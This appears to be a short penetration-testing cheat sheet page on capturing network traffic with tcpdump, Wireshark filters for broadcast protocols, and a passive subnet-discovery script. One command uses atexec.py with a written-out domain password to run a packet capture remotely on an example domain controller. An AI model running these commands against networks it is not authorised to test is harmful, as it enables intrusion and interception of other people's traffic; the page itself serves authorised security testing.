Sniff Traffic

Last updated 6 months ago

Sniff Traffic

tcpdump

Linux (while connected via SSH):

$ sudo tcpdump -i eth0 -w dump.pcap -s0 'not tcp port 22' &

Windows:

$ wget http://chiselapp.com/user/rkeene/repository/tcpdump-windows-wrapper/raw/tcpdump.exe?name=2e3d4d01fa597e1f50ba3ead8f18b8eeacb83812
$ atexec.py -silentcommand megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 'C:\Windows\Temp\tcpdump.exe -G 1800 -W 1 -i 0.0.0.0 -w C:\Windows\Temp\capture.pcap'
$ sleep 30m

Wireshark

Filters

Protocols to consider:

(Dynamic Trunking Protocol)
(Open Shortest Path First)
(Simple Service Discovery Protocol)
(Address Resolution Protocol)
(Link-Local Multicast Name Resolution)
(NetBIOS Name Service)
(Multicast DNS)
(Internet Control Message Protocol version 6)
(Dynamic Host Configuration Protocol version 6)

dtp || ospf || ssdp || arp || llmnr || nbns || mdns || icmpv6 || dhcpv6

Scapy

Passively detect live subnets:

$ sudo python3 SilentListener.py -i eth0 -o ranges.txt [--scan]

Last updated 6 months ago